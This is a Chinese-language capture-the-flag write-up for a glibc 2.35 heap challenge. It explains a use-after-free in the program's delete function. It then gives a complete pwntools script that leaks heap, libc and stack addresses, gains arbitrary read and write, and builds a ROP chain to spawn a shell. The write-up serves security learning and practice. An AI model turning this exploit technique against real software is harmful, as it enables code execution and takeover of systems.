1.IDA寻找漏洞点
常规的pwn堆提,有增删改查功能。
select函数做了对qword6060赋值的一个动作:
qword6060的作用是存储用于show和edit功能的paint结构体指针。
问题出在删除函数没有将qword6060置0导致了UAF的产生。
2分析add函数还原结构体
printf("x: ");
__isoc99_scanf("%lu", &v3);
printf("y: ");
__isoc99_scanf("%lu", &v4);
printf("width: ");
__isoc99_scanf("%lu", &v5);
printf("height: ");
__isoc99_scanf("%lu", &v6);
printf("color(1=red, 2=green): ");
__isoc99_scanf("%d", &v2);
getchar();
if ( v3 <= 0x1F && v4 <= 0x1F && v5 <= 0x20 && v6 <= 0x20 && v3 + v5 <= 0x20 && v4 + v5 <= 0x20 )
{
if ( v2 > 0 && v2 <= 2 )
{
if ( qword_4060[32 * v3 + v4] )
{
puts("The selected cell is full");
}
else
{
v7 = malloc(0x30uLL);
*(_QWORD *)v7 = v3;
*((_QWORD *)v7 + 1) = v4;
*((_QWORD *)v7 + 3) = v5;
*((_QWORD *)v7 + 4) = v6;
if ( v2 == 1 )
v0 = "\x1B[31m";
else
v0 = "\x1B[32m";
*((_QWORD *)v7 + 2) = v0;
*((_QWORD *)v7 + 5) = malloc(v5 * v6);
memset(*((void **)v7 + 5), 0, v6 * v5);
printf("content: ");
read(0, *((void **)v7 + 5), v6 * v5);
qword_4060[32 * v3 + v4] = v7;
}
}
可以分析出paint结构体如下
[+0:x,
+8:y,
+16:des,
+24:width,
+32:height,
+40:&context]
3漏洞利用
题目所给库版本是2.35存在tcache机制,依据tache后进先出的机制,可以先申请一个context大小为0x40的块和三块context超过0x70大小的块(方便待会泄露libc基址)。
申请完如下:
然后释放三个0x40块到空闲链表中。
select(0,0)
现在qword指向0x55f2bf0b73a0
现在申请一次context为0x40的块(称为a块) 这样的话a块就可以控制paint结构体,也就间接控制了一个paint结构体。只需要重复释放申请a块就可以造成多次任意读和任意写。用任意写将链表的数量改大方便块进入unsortedbin内,然后任意读泄露库的地址。接着任意读库里的environ变量就可以获得栈地址,任意写栈完成rop。最后ret退出拿到权限。
脚本如下:
from pwn import*
def gd():
gdb.attach(p)
pause()
def add(x,y,x1,y1,data):
p.recvuntil(b'> ')
p.sendline(b'1')
p.recvuntil(b'x: ')
p.sendline(str(x).encode())
p.recvuntil(b'y: ')
p.sendline(str(y).encode())
p.recvuntil(b'width: ')
p.sendline(str(x1).encode())
p.recvuntil(b'height: ')
p.sendline(str(y1).encode())
p.recvuntil(b'color(1=red, 2=green): ')
p.sendline(b'1')
p.recvuntil(b'content: ')
p.send(data)
def free(x,y):
p.recvuntil(b'> ')
p.sendline(b'2')
p.recvuntil(b'x: ')
p.sendline(str(x).encode())
p.recvuntil(b'y: ')
p.sendline(str(y).encode())
def select(x,y):
p.recvuntil(b'> ')
p.sendline(b'3')
p.recvuntil(b'x: ')
p.sendline(str(x).encode())
p.recvuntil(b'y: ')
p.sendline(str(y).encode())
def edit(data):
p.recvuntil(b'> ')
p.sendline(b'4')
p.recvuntil(b'New content: ')
p.send(data)
def show():
p.recvuntil(b'> ')
p.sendline(b'5')
p=process("./pwn")
libc = ELF("libc.so.6")
add(0,0,8,6,b'a')
select(0,0)
free(0,0)
show()
p.recvline()
heap_base = (u64(p.recv(7).ljust(8,b'\x00'))<<12)
heap_key = heap_base
print(hex(heap_base))
add(0,0,8,6,b'a')
add(0,1,8,20,b'a')
add(0,2,8,20,b'a')
add(0,3,8,20,b'a')
free(0,0)
free(0,1)
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(heap_base+0x20))
edit(b'\x07' * 8)
free(0,1)
free(0,2)
add(0,2,8,20,b'a')
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(heap_base+0x450))
show()
p.recvline()
libc_base = (u64(p.recv(7).ljust(8,b'\x00'))) - 0x219ce0
print(hex(libc_base))
environ = libc_base + libc.sym['environ']
free(0,1)
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(environ))
show()
p.recvline()
stack = (u64(p.recv(7).ljust(8,b'\x00'))) - 0x120
free(0,1)
add(0,1,8,6,b'a' * 8+ p64(0) * 2 + p64(0x10) * 2 + p64(stack))
sh = libc_base + next(libc.search(b"/bin/sh"))
sys_addr = libc_base + libc.sym['system']
pop_rdi = libc_base + 0x000000000002a3e5
ret_addr = libc_base + 0x000000000002db7d
edit(p64(pop_rdi) + p64(sh) + p64(ret_addr) + p64(sys_addr))
p.sendline(b'cat_of_fish')
#gd()
p.interactive()
成功getshell